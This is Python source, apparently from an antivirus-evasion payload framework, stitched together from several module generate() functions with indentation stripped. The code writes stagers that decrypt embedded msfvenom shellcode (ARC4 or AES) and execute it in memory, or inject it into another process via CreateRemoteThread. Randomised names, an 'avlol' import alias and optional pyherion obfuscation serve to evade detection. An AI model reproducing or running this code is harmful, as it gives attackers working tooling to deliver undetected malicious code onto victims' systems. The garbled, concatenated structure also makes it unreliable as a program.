payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n'
payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n'
payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
payloadCode = encryption.pyherion(payloadCode)
return payloadCode
def generate(self):
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandARCKey = helpers.randomString()
RandARCPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (ARCKey, iv)) = encryption.encryptARC(Shellcode)
PayloadCode = 'from Crypto.Cipher import ARC4\n'
PayloadCode += 'import ctypes as avlol\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode(
"string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(' + ShellcodeVariableName + ')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(
days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandARCKey = helpers.randomString()
RandARCPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (ARCKey, iv)) = encryption.encryptARC(Shellcode)
PayloadCode = 'from Crypto.Cipher import ARC4\n'
PayloadCode += 'import ctypes as avlol\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[
2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
PayloadCode += '\t' + RandARCKey + ' = \'' + ARCKey + '\'\n'
PayloadCode += '\t' + RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode(
"string_escape") + '\'\n'
PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(' + ShellcodeVariableName + ')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
if self.required_options["INJECT_METHOD"][0].lower() == "heap":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandARCKey = helpers.randomString()
RandARCPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
HeapVar = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (ARCKey, iv)) = encryption.encryptARC(Shellcode)
PayloadCode = 'from Crypto.Cipher import ARC4\n'
PayloadCode += 'import ctypes as avlol\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode(
"string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n'
PayloadCode += RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(
days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandARCKey = helpers.randomString()
RandARCPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
HeapVar = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (ARCKey, iv)) = encryption.encryptARC(Shellcode)
PayloadCode = 'from Crypto.Cipher import ARC4\n'
PayloadCode += 'import ctypes as avlol\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[
2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
PayloadCode += '\t' + RandARCKey + ' = \'' + ARCKey + '\'\n'
PayloadCode += '\t' + RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode(
"string_escape") + '\'\n'
PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += '\t' + HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n'
PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandARCKey = helpers.randomString()
RandARCPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (ARCKey, iv)) = encryption.encryptARC(Shellcode)
PayloadCode = 'from Crypto.Cipher import ARC4\n'
PayloadCode += 'from ctypes import *\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode(
"string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += RandShellcode + '()'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(
days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandARCKey = helpers.randomString()
RandARCPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (ARCKey, iv)) = encryption.encryptARC(Shellcode)
PayloadCode = 'from Crypto.Cipher import ARC4\n'
PayloadCode += 'from ctypes import *\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[
2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
PayloadCode += '\t' + RandARCKey + ' = \'' + ARCKey + '\'\n'
PayloadCode += '\t' + RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode(
"string_escape") + '\'\n'
PayloadCode += '\t' + ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += '\t' + RandShellcode + '()'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
def generate(self):
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
pid_num_variable = helpers.randomString()
pagerwx_variable = helpers.randomString()
processall_variable = helpers.randomString()
memcommit_variable = helpers.randomString()
shell_length_variable = helpers.randomString()
memalloc_variable = helpers.randomString()
prochandle_variable = helpers.randomString()
kernel32_variable = helpers.randomString()
# Create Payload code
PayloadCode = 'from ctypes import *\n\n'
PayloadCode += pagerwx_variable + ' = 0x40\n'
PayloadCode += processall_variable + ' = 0x1F0FFF\n'
PayloadCode += memcommit_variable + ' = 0x00001000\n'
PayloadCode += kernel32_variable + ' = windll.kernel32\n'
PayloadCode += ShellcodeVariableName + ' = \"' + Shellcode + '\"\n'
PayloadCode += pid_num_variable + ' = ' + self.required_options["PID_NUMBER"][0] +'\n'
PayloadCode += shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n\n'
PayloadCode += prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n'
PayloadCode += memalloc_variable + ' = ' + kernel32_variable + '.VirtualAllocEx(' + prochandle_variable + ', 0, ' + shell_length_variable + ', ' + memcommit_variable + ', ' + pagerwx_variable + ')\n'
PayloadCode += kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n'
PayloadCode += kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
pid_num_variable = helpers.randomString()
pagerwx_variable = helpers.randomString()
processall_variable = helpers.randomString()
memcommit_variable = helpers.randomString()
shell_length_variable = helpers.randomString()
memalloc_variable = helpers.randomString()
prochandle_variable = helpers.randomString()
kernel32_variable = helpers.randomString()
# Create Payload code
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += pagerwx_variable + ' = 0x40\n'
PayloadCode += processall_variable + ' = 0x1F0FFF\n'
PayloadCode += memcommit_variable + ' = 0x00001000\n'
PayloadCode += kernel32_variable + ' = windll.kernel32\n'
PayloadCode += ShellcodeVariableName + ' = \"' + Shellcode + '\"\n'
PayloadCode += pid_num_variable + ' = ' + self.required_options["PID_NUMBER"][0] +'\n'
PayloadCode += shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n\n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n'
PayloadCode += '\t' + memalloc_variable + ' = ' + kernel32_variable + '.VirtualAllocEx(' + prochandle_variable + ', 0, ' + shell_length_variable + ', ' + memcommit_variable + ', ' + pagerwx_variable + ')\n'
PayloadCode += '\t' + kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n'
PayloadCode += '\t' + kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
def generate(self):
if self.required_options["inject_method"][0].lower() == "virtual":
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += RandPadding + ' = \'{\'\n'
PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandPadding + ' = \'{\'\n'
PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += '\t' + RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
PayloadCode += '\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += '\t' + RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
if self.required_options["inject_method"][0].lower() == "heap":
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
HeapVar = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += RandPadding + ' = \'{\'\n'
PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
HeapVar = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandPadding + ' = \'{\'\n'
PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += '\t' + RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
PayloadCode += '\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += '\t' + HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n'
PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
# Create Payload code
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
